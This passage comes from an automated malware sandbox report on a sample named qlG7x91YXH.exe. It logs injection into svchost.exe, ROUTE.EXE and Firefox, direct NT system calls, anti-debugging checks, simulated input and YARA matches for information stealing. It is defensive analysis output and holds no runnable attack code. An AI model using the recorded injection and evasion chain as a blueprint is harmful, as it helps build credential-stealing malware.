                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D9083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D909D5 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D90C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: read write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread register set: target process: 8136
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread APC queued: target process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 31B4008
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74735590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DB2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDB226 SendInput,keybd_event
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DF22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: qlG7x91YXH.exe, sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D90698 cpuid
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DCD27A GetUserNameW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
